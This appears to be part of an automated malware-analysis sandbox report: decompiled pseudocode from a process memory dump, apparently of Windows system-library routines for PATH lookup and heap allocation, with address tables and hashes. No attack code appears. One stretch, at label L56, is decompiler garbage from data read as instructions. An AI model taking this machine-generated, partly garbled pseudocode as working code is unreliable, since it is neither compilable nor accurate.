				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t344 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t285 = 0x48;
				_t315 = 0 | _t344 == 0x00000000;
				_t326 = 0;
				_v37 = _t344 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t285 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t334 = 0xc0000106;
						goto L32;
					} else {
						_t333 = L012E4620(_t295,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t285);
						_v52 = _t333;
						__eflags = _t333;
						if(_t333 == 0) {
							_t334 = 0xc0000017;
							goto L32;
						} else {
							 *(_t333 + 0x44) =  *(_t333 + 0x44) & 0x00000000;
							_t50 = _t333 + 0x48; // 0x48
							_t328 = _t50;
							_t315 = _v32;
							 *((intOrPtr*)(_t333 + 0x3c)) = _t285;
							_t287 = 0;
							 *((short*)(_t333 + 0x30)) = _v48;
							__eflags = _t315;
							if(_t315 != 0) {
								 *(_t333 + 0x18) = _t328;
								__eflags = _t315 - 0x13b8478;
								 *_t333 = ((0 | _t315 == 0x013b8478) - 0x00000001 & 0xfffffffb) + 7;
								E0130F3E0(_t328,  *((intOrPtr*)(_t315 + 4)),  *_t315 & 0x0000ffff);
								_t315 = _v32;
								_t341 = _t341 + 0xc;
								_t287 = 1;
								__eflags = _a8;
								_t328 = _t328 + (( *_t315 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t279 = E013539F2(_t328);
									_t315 = _v32;
									_t328 = _t279;
								}
							}
							_t299 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t334 = _v68;
								__eflags = 0;
								 *((short*)(_t328 - 2)) = 0;
								goto L32;
							} else {
								_t289 = _t333 + _t287 * 4;
								_v56 = _t289;
								do {
									__eflags = _t315;
									if(_t315 != 0) {
										_t240 =  *(_v60 + _t299 * 4);
										__eflags = _t240;
										if(_t240 == 0) {
											goto L30;
										} else {
											__eflags = _t240 == 5;
											if(_t240 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t289 =  *(_v60 + _t299 * 4);
										 *(_t289 + 0x18) = _t328;
										_t244 =  *(_v60 + _t299 * 4);
										__eflags = _t244 - 8;
										if(_t244 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t244 * 4 +  &M012F2959))) {
												case 0:
													__ax =  *0x13b8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0130F3E0(__edi,  *0x13b848c, __ax & 0x0000ffff);
														__eax =  *0x13b8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0130F3E0(_t328, _v80, _v64);
													_t274 = _v64;
													goto L26;
												case 2:
													 *0x13b8480 & 0x0000ffff = E0130F3E0(__edi,  *0x13b8484,  *0x13b8480 & 0x0000ffff);
													__eax =  *0x13b8480 & 0x0000ffff;
													__eax = ( *0x13b8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0130F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0130F3E0(_t328, _v76, _v36);
														_t274 = _v36;
													}
													L26:
													_t341 = _t341 + 0xc;
													_t328 = _t328 + (_t274 >> 1) * 2 + 2;
													__eflags = _t328;
													L27:
													_push(0x3b);
													_pop(_t276);
													 *((short*)(_t328 - 2)) = _t276;
													goto L28;
												case 6:
													__ebx =  *0x13b575c;
													__eflags = __ebx - 0x13b575c;
													if(__ebx != 0x13b575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0130F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x13b575c;
														} while (__ebx != 0x13b575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x13b8478 & 0x0000ffff = E0130F3E0(__edi,  *0x13b847c,  *0x13b8478 & 0x0000ffff);
													__eax =  *0x13b8478 & 0x0000ffff;
													__eax = ( *0x13b8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E013539F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x13b6e58 & 0x0000ffff = E0130F3E0(__edi,  *0x13b6e5c,  *0x13b6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x13b6e58 & 0x0000ffff;
													__eax = ( *0x13b6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t299 = _v16;
													_t315 = _v32;
													L29:
													_t289 = _t289 + 4;
													__eflags = _t289;
													_v56 = _t289;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t299 = _t299 + 1;
									_v16 = _t299;
									__eflags = _t299 - _v48;
								} while (_t299 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t244 =  *(_v60 + _t326 * 4);
						if(_t244 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t244 * 4 +  &M012F2935))) {
							case 0:
								__ax =  *0x13b8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t315 =  &_v64;
								_v80 = E012F2E3E(0,  &_v64);
								_t285 = _t285 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x13b8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x13b8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E012DEEF0(0x13b79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E012DEB70(__ecx, 0x13b79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t218 = _v72;
											__eflags = _t218;
											if(_t218 != 0) {
												L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
											}
											_t219 = _v52;
											__eflags = _t219;
											if(_t219 != 0) {
												__eflags = _t334;
												if(_t334 < 0) {
													L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219);
													_t219 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t295 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x13b7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L012E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E012DEB70(__ecx, 0x13b79a0);
										__eax = _v52;
										L36:
										_pop(_t327);
										_pop(_t335);
										__eflags = _v8 ^ _t338;
										_pop(_t286);
										return E0130B640(_t219, _t286, _v8 ^ _t338, _t315, _t327, _t335);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t281 = _v56;
								if(_v56 != 0) {
									_t315 =  &_v36;
									_t283 = E012F2E3E(_t281,  &_v36);
									_t295 = _v36;
									_v76 = _t283;
								}
								if(_t295 == 0) {
									goto L44;
								} else {
									_t285 = _t285 + 2 + _t295;
								}
								goto L14;
							case 6:
								__eax =  *0x13b5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x13b8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x13b8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x13b6e58 & 0x0000ffff;
								__eax = ( *0x13b6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t326 = _t326 + 1;
								if(_t326 >= _v48) {
									goto L16;
								} else {
									_t315 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t300 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("das");
					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t341;
					asm("das");
					_t245 = _t244 + _t341;
					asm("daa");
					asm("das");
					 *_t333 =  *_t333 + _t338;
					asm("das");
					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t245;
					asm("das");
					 *0x1f012f26 =  *0x1f012f26 + _t245;
					_pop(_t290);
					_t247 = _t341;
					_t343 = _t245 ^  *_t300;
					 *_t328 =  *_t328 - _t300;
					 *0x201335b =  *0x201335b + _t333;
					 *_t328 =  *_t328 - _t338;
					 *((intOrPtr*)(_t247 - 0x9fed0d8)) =  *((intOrPtr*)(_t341 - 0x9fed0d8)) + _t341;
					asm("daa");
					asm("das");
					 *_t333 =  *_t333 + _t290;
					 *_t328 =  *_t328 - _t300;
					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t300;
					asm("das");
					_a35 = _a35 + _t290;
					asm("das");
					_pop(_t291);
					asm("das");
					 *((intOrPtr*)(_t343 + _t291 * 2)) =  *((intOrPtr*)(_t343 + _t291 * 2)) + _t333;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x139ff00);
					E0131D08C(_t291, _t328, _t333);
					_v44 =  *[fs:0x18];
					_t329 = 0;
					 *_a24 = 0;
					_t292 = _a12;
					__eflags = _t292;
					if(_t292 == 0) {
						_t254 = 0xc0000100;
					} else {
						_v8 = 0;
						_t336 = 0xc0000100;
						_v52 = 0xc0000100;
						_t256 = 4;
						while(1) {
							_v40 = _t256;
							__eflags = _t256;
							if(_t256 == 0) {
								break;
							}
							_t305 = _t256 * 0xc;
							_v48 = _t305;
							__eflags = _t292 -  *((intOrPtr*)(_t305 + 0x12a1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t271 = E0130E5C0(_a8,  *((intOrPtr*)(_t305 + 0x12a1668)), _t292);
									_t343 = _t343 + 0xc;
									__eflags = _t271;
									if(__eflags == 0) {
										_t336 = E013451BE(_t292,  *((intOrPtr*)(_v48 + 0x12a166c)), _a16, _t329, _t336, __eflags, _a20, _a24);
										_v52 = _t336;
										break;
									} else {
										_t256 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t256 = _t256 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t336;
						__eflags = _t336;
						if(_t336 < 0) {
							__eflags = _t336 - 0xc0000100;
							if(_t336 == 0xc0000100) {
								_t301 = _a4;
								__eflags = _t301;
								if(_t301 != 0) {
									_v36 = _t301;
									__eflags =  *_t301 - _t329;
									if( *_t301 == _t329) {
										_t336 = 0xc0000100;
										goto L76;
									} else {
										_t317 =  *((intOrPtr*)(_v44 + 0x30));
										_t258 =  *((intOrPtr*)(_t317 + 0x10));
										__eflags =  *((intOrPtr*)(_t258 + 0x48)) - _t301;
										if( *((intOrPtr*)(_t258 + 0x48)) == _t301) {
											__eflags =  *(_t317 + 0x1c);
											if( *(_t317 + 0x1c) == 0) {
												L106:
												_t336 = E012F2AE4( &_v36, _a8, _t292, _a16, _a20, _a24);
												_v32 = _t336;
												__eflags = _t336 - 0xc0000100;
												if(_t336 != 0xc0000100) {
													goto L69;
												} else {
													_t329 = 1;
													_t301 = _v36;
													goto L75;
												}
											} else {
												_t261 = E012D6600( *(_t317 + 0x1c));
												__eflags = _t261;
												if(_t261 != 0) {
													goto L106;
												} else {
													_t301 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t336 = E012F2C50(_t301, _a8, _t292, _a16, _a20, _a24, _t329);
											L76:
											_v32 = _t336;
											goto L69;
										}
									}
									goto L108;
								} else {
									E012DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t336 = _a24;
									_t268 = E012F2AE4( &_v36, _a8, _t292, _a16, _a20, _t336);
									_v32 = _t268;
									__eflags = _t268 - 0xc0000100;
									if(_t268 == 0xc0000100) {
										_v32 = E012F2C50(_v36, _a8, _t292, _a16, _a20, _t336, 1);
									}
									_v8 = _t329;
									E012F2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t254 = _t336;
					}
					L70:
					return E0131D0D1(_t254);
				}
				L108:
			}






















































                                                            0x012f2584
                                                            0x012f2586
                                                            0x012f2590
                                                            0x012f2596
                                                            0x012f2597
                                                            0x012f2598
                                                            0x012f2599
                                                            0x012f259e
                                                            0x012f25a4
                                                            0x012f25a9
                                                            0x012f25ac
                                                            0x012f25ae
                                                            0x012f25b1
                                                            0x012f25b2
                                                            0x012f25b5
                                                            0x012f25b8
                                                            0x012f25bb
                                                            0x012f25bc
                                                            0x012f25bf
                                                            0x012f25c2
                                                            0x012f25c5
                                                            0x012f25c6
                                                            0x012f25cb
                                                            0x012f25ce
                                                            0x012f25d8
                                                            0x012f25db
                                                            0x012f25dd
                                                            0x012f25de
                                                            0x012f25e1
                                                            0x012f25e3
                                                            0x012f25e9
                                                            0x012f26da
                                                            0x012f26da
                                                            0x012f26dd
                                                            0x012f26e2
                                                            0x01335b56
                                                            0x00000000
                                                            0x012f26e8
                                                            0x012f26f9
                                                            0x012f26fb
                                                            0x012f26fe
                                                            0x012f2700
                                                            0x01335b60
                                                            0x00000000
                                                            0x012f2706
                                                            0x012f2706
                                                            0x012f270a
                                                            0x012f270a
                                                            0x012f270d
                                                            0x012f2713
                                                            0x012f2716
                                                            0x012f2718
                                                            0x012f271c
                                                            0x012f271e
                                                            0x01335b6c
                                                            0x01335b6f
                                                            0x01335b7f
                                                            0x01335b89
                                                            0x01335b8e
                                                            0x01335b93
                                                            0x01335b96
                                                            0x01335b9c
                                                            0x01335ba0
                                                            0x01335ba3
                                                            0x01335bab
                                                            0x01335bb0
                                                            0x01335bb3
                                                            0x01335bb3
                                                            0x01335ba3
                                                            0x012f2724
                                                            0x012f2726
                                                            0x012f2729
                                                            0x012f272c
                                                            0x012f279d
                                                            0x012f279d
                                                            0x012f27a0
                                                            0x012f27a2
                                                            0x00000000
                                                            0x012f272e
                                                            0x012f272e
                                                            0x012f2731
                                                            0x012f2734
                                                            0x012f2734
                                                            0x012f2736
                                                            0x01335bc1
                                                            0x01335bc1
                                                            0x01335bc4
                                                            0x00000000
                                                            0x01335bca
                                                            0x01335bca
                                                            0x01335bcd
                                                            0x00000000
                                                            0x01335bd3
                                                            0x00000000
                                                            0x01335bd3
                                                            0x01335bcd
                                                            0x012f273c
                                                            0x012f273c
                                                            0x012f2742
                                                            0x012f2747
                                                            0x012f274a
                                                            0x012f274d
                                                            0x012f2750
                                                            0x00000000
                                                            0x012f2756
                                                            0x012f2756
                                                            0x00000000
                                                            0x012f2902
                                                            0x012f2908
                                                            0x012f290b
                                                            0x00000000
                                                            0x012f2911
                                                            0x012f291c
                                                            0x012f2921
                                                            0x00000000
                                                            0x012f2921
                                                            0x00000000
                                                            0x00000000
                                                            0x012f2880
                                                            0x012f2887
                                                            0x012f288c
                                                            0x00000000
                                                            0x00000000
                                                            0x012f2805
                                                            0x012f280a
                                                            0x012f2814
                                                            0x012f2816
                                                            0x00000000
                                                            0x00000000
                                                            0x012f281e
                                                            0x012f2821
                                                            0x012f2823
                                                            0x00000000
                                                            0x012f2829
                                                            0x012f2829
                                                            0x012f2831
                                                            0x012f283c
                                                            0x012f283e
                                                            0x00000000
                                                            0x012f283e
                                                            0x00000000
                                                            0x00000000
                                                            0x012f284e
                                                            0x012f2850
                                                            0x012f2851
                                                            0x012f2854
                                                            0x012f2857
                                                            0x012f285a
                                                            0x012f285c
                                                            0x012f285d
                                                            0x00000000
                                                            0x00000000
                                                            0x012f275d
                                                            0x012f2761
                                                            0x00000000
                                                            0x012f2767
                                                            0x012f276e
                                                            0x012f2773
                                                            0x012f2773
                                                            0x012f2776
                                                            0x012f2778
                                                            0x012f277e
                                                            0x012f277e
                                                            0x012f2781
                                                            0x012f2781
                                                            0x012f2783
                                                            0x012f2784
                                                            0x00000000
                                                            0x00000000
                                                            0x01335bd8
                                                            0x01335bde
                                                            0x01335be4
                                                            0x01335be6
                                                            0x01335be8
                                                            0x01335be9
                                                            0x01335bee
                                                            0x01335bf8
                                                            0x01335bff
                                                            0x01335c01
                                                            0x01335c04
                                                            0x01335c07
                                                            0x01335c0b
                                                            0x01335c0d
                                                            0x01335c0d
                                                            0x01335c15
                                                            0x01335c18
                                                            0x01335c1b
                                                            0x01335c1b
                                                            0x01335c1e
                                                            0x00000000
                                                            0x00000000
                                                            0x012f28c3
                                                            0x012f28c8
                                                            0x012f28d2
                                                            0x012f28d4
                                                            0x012f28d8
                                                            0x012f28db
                                                            0x01335c26
                                                            0x01335c28
                                                            0x01335c2d
                                                            0x01335c2d
                                                            0x00000000
                                                            0x00000000
                                                            0x01335c34
                                                            0x01335c36
                                                            0x01335c49
                                                            0x01335c4e
                                                            0x01335c54
                                                            0x01335c5b
                                                            0x01335c5d
                                                            0x01335c60
                                                            0x012f2788
                                                            0x012f2788
                                                            0x012f278b
                                                            0x012f278e
                                                            0x012f278e
                                                            0x012f278e
                                                            0x012f2791
                                                            0x00000000
                                                            0x00000000
                                                            0x012f2756
                                                            0x012f2750
                                                            0x00000000
                                                            0x012f2794
                                                            0x012f2794
                                                            0x012f2795
                                                            0x012f2798
                                                            0x012f2798
                                                            0x00000000
                                                            0x012f2734
                                                            0x012f272c
                                                            0x012f2700
                                                            0x012f25ef
                                                            0x012f25ef
                                                            0x012f25ef
                                                            0x012f25f2
                                                            0x012f25f8
                                                            0x00000000
                                                            0x00000000
                                                            0x012f25fe
                                                            0x00000000
                                                            0x012f28e6
                                                            0x012f28ec
                                                            0x012f28ef
                                                            0x012f28f5
                                                            0x012f28f8
                                                            0x012f28f8
                                                            0x00000000
                                                            0x012f28f8
                                                            0x00000000
                                                            0x00000000
                                                            0x012f2866
                                                            0x012f2866
                                                            0x012f2876
                                                            0x012f2879
                                                            0x00000000
                                                            0x00000000
                                                            0x012f27e0
                                                            0x012f27e7
                                                            0x012f27e9
                                                            0x012f27eb
                                                            0x01335afd
                                                            0x00000000
                                                            0x01335afd
                                                            0x00000000
                                                            0x00000000
                                                            0x012f2633
                                                            0x012f2638
                                                            0x012f263b
                                                            0x012f263c
                                                            0x012f263e
                                                            0x012f2640
                                                            0x012f2642
                                                            0x012f2647
                                                            0x012f2649
                                                            0x012f264e
                                                            0x012f2650
                                                            0x012f2653
                                                            0x012f2659
                                                            0x012f26a2
                                                            0x012f26a7
                                                            0x012f26ac
                                                            0x012f26b2
                                                            0x01335b11
                                                            0x01335b15
                                                            0x01335b17
                                                            0x00000000
                                                            0x012f26b8
                                                            0x012f26b8
                                                            0x012f26ba
                                                            0x012f27a6
                                                            0x012f27a6
                                                            0x012f27a9
                                                            0x012f27ab
                                                            0x012f27b9
                                                            0x012f27b9
                                                            0x012f27be
                                                            0x012f27c1
                                                            0x012f27c3
                                                            0x012f27c5
                                                            0x012f27c7
                                                            0x01335c74
                                                            0x01335c79
                                                            0x01335c79
                                                            0x012f27c7
                                                            0x00000000
                                                            0x012f26c0
                                                            0x012f26c0
                                                            0x012f26c3
                                                            0x012f26c6
                                                            0x012f26c6
                                                            0x012f26c9
                                                            0x012f26c9
                                                            0x00000000
                                                            0x012f26c9
                                                            0x012f26ba
                                                            0x012f265b
                                                            0x012f265b
                                                            0x012f265e
                                                            0x012f2667
                                                            0x012f266d
                                                            0x012f2677
                                                            0x012f267c
                                                            0x012f267f
                                                            0x012f2681
                                                            0x01335b49
                                                            0x01335b4e
                                                            0x012f27cd
                                                            0x012f27d0
                                                            0x012f27d1
                                                            0x012f27d2
                                                            0x012f27d4
                                                            0x012f27dd
                                                            0x012f2687
                                                            0x012f2687
                                                            0x012f268a
                                                            0x012f268b
                                                            0x012f268e
                                                            0x012f268f
                                                            0x012f2691
                                                            0x012f2696
                                                            0x012f2698
                                                            0x012f269d
                                                            0x012f269f
                                                            0x00000000
                                                            0x012f269f
                                                            0x012f2681
                                                            0x00000000
                                                            0x00000000
                                                            0x012f2846
                                                            0x00000000
                                                            0x00000000
                                                            0x012f2605
                                                            0x012f260a
                                                            0x012f260c
                                                            0x012f2611
                                                            0x012f2616
                                                            0x012f2619
                                                            0x012f2619
                                                            0x012f261e
                                                            0x00000000
                                                            0x012f2624
                                                            0x012f2627
                                                            0x012f2627
                                                            0x00000000
                                                            0x00000000
                                                            0x01335b1f
                                                            0x00000000
                                                            0x00000000
                                                            0x012f2894
                                                            0x012f289b
                                                            0x012f289d
                                                            0x012f28a1
                                                            0x01335b2b
                                                            0x01335b2e
                                                            0x01335b2e
                                                            0x012f28a7
                                                            0x012f28a9
                                                            0x01335b04
                                                            0x01335b09
                                                            0x01335b09
                                                            0x01335b09
                                                            0x00000000
                                                            0x00000000
                                                            0x01335b35
                                                            0x01335b3c
                                                            0x012f28fb
                                                            0x012f28fb
                                                            0x012f26cc
                                                            0x012f26cc
                                                            0x012f26d0
                                                            0x00000000
                                                            0x012f26d2
                                                            0x012f26d2
                                                            0x00000000
                                                            0x012f26d2
                                                            0x00000000
                                                            0x00000000
                                                            0x012f25fe
                                                            0x012f292d
                                                            0x012f292f
                                                            0x012f2930
                                                            0x012f2935
                                                            0x012f2937
                                                            0x012f2938
                                                            0x012f293b
                                                            0x012f293c
                                                            0x012f293e
                                                            0x012f293f
                                                            0x012f2940
                                                            0x012f2942
                                                            0x012f2944
                                                            0x012f2947
                                                            0x012f2948
                                                            0x012f294e
                                                            0x012f2951
                                                            0x012f2951
                                                            0x012f2952
                                                            0x012f2954
                                                            0x012f295a
                                                            0x012f295c
                                                            0x012f2962
                                                            0x012f2963
                                                            0x012f2964
                                                            0x012f2966
                                                            0x012f2968
                                                            0x012f296b
                                                            0x012f296c
                                                            0x012f296f
                                                            0x012f2972
                                                            0x012f2977
                                                            0x012f2978
                                                            0x012f297d
                                                            0x012f297e
                                                            0x012f297f
                                                            0x012f2980
                                                            0x012f2981
                                                            0x012f2982
                                                            0x012f2983
                                                            0x012f2984
                                                            0x012f2985
                                                            0x012f2986
                                                            0x012f2987
                                                            0x012f2988
                                                            0x012f2989
                                                            0x012f298a
                                                            0x012f298b
                                                            0x012f298c
                                                            0x012f298d
                                                            0x012f298e
                                                            0x012f298f
                                                            0x012f2990
                                                            0x012f2992
                                                            0x012f2997
                                                            0x012f29a3
                                                            0x012f29a6
                                                            0x012f29ab
                                                            0x012f29ad
                                                            0x012f29b0
                                                            0x012f29b2
                                                            0x01335c80
                                                            0x012f29b8
                                                            0x012f29b8
                                                            0x012f29bb
                                                            0x012f29c0
                                                            0x012f29c5
                                                            0x012f29c6
                                                            0x012f29c6
                                                            0x012f29c9
                                                            0x012f29cb
                                                            0x00000000
                                                            0x00000000
                                                            0x012f29cd
                                                            0x012f29d0
                                                            0x012f29d9
                                                            0x012f29db
                                                            0x012f29dd
                                                            0x012f2a7f
                                                            0x012f2a84
                                                            0x012f2a87
                                                            0x012f2a89
                                                            0x01335ca1
                                                            0x01335ca3
                                                            0x00000000
                                                            0x012f2a8f
                                                            0x012f2a8f
                                                            0x00000000
                                                            0x012f2a8f
                                                            0x00000000
                                                            0x012f29e3
                                                            0x012f29e3
                                                            0x012f29e3
                                                            0x00000000
                                                            0x012f29e3
                                                            0x012f29dd
                                                            0x00000000
                                                            0x012f29db
                                                            0x012f29e6
                                                            0x012f29e9
                                                            0x012f29eb
                                                            0x012f29ed
                                                            0x012f29f3
                                                            0x012f29f5
                                                            0x012f29f8
                                                            0x012f29fa
                                                            0x012f2a97
                                                            0x012f2a9a
                                                            0x012f2a9d
                                                            0x012f2add
                                                            0x00000000
                                                            0x012f2a9f
                                                            0x012f2aa2
                                                            0x012f2aa5
                                                            0x012f2aa8
                                                            0x012f2aab
                                                            0x01335cab
                                                            0x01335caf
                                                            0x01335cc5
                                                            0x01335cda
                                                            0x01335cdc
                                                            0x01335cdf
                                                            0x01335ce5
                                                            0x00000000
                                                            0x01335ceb
                                                            0x01335ced
                                                            0x01335cee
                                                            0x00000000
                                                            0x01335cee
                                                            0x01335cb1
                                                            0x01335cb4
                                                            0x01335cb9
                                                            0x01335cbb
                                                            0x00000000
                                                            0x01335cbd
                                                            0x01335cbd
                                                            0x00000000
                                                            0x01335cbd
                                                            0x01335cbb
                                                            0x012f2ab1
                                                            0x012f2ab1
                                                            0x012f2ac4
                                                            0x012f2ac6
                                                            0x012f2ac6
                                                            0x00000000
                                                            0x012f2ac6
                                                            0x012f2aab
                                                            0x00000000
                                                            0x012f2a00
                                                            0x012f2a09
                                                            0x012f2a0e
                                                            0x012f2a21
                                                            0x012f2a24
                                                            0x012f2a35
                                                            0x012f2a3a
                                                            0x012f2a3d
                                                            0x012f2a42
                                                            0x012f2a59
                                                            0x012f2a59
                                                            0x012f2a5c
                                                            0x012f2a5f
                                                            0x012f2a5f
                                                            0x012f29fa
                                                            0x012f29f3
                                                            0x012f2a64
                                                            0x012f2a64
                                                            0x012f2a6b
                                                            0x012f2a6b
                                                            0x012f2a6d
                                                            0x012f2a72
                                                            0x012f2a72
                                                            0x00000000

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PATH
                                                            • API String ID: 0-1036084923
                                                            • Opcode ID: 8494966255c402124fd99c7a6650475fa05133fbb1780de0e7569a3141e2c3b5
                                                            • Instruction ID: f4de659b8e6f6f4b396801b92a7b9c9ddad8146dd7b3ed4638e76acce77c2948
                                                            • Opcode Fuzzy Hash: 8494966255c402124fd99c7a6650475fa05133fbb1780de0e7569a3141e2c3b5
                                                            • Instruction Fuzzy Hash: D5C18E71D2020ADBDB29DF99D881AAEFBB4FF49714F14402DE601AB290E774E841CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012FFAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 80%
                                                            			E012FFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E012DEEF0(0x13b7b60);
					_t134 =  *0x13b7b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x13b7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
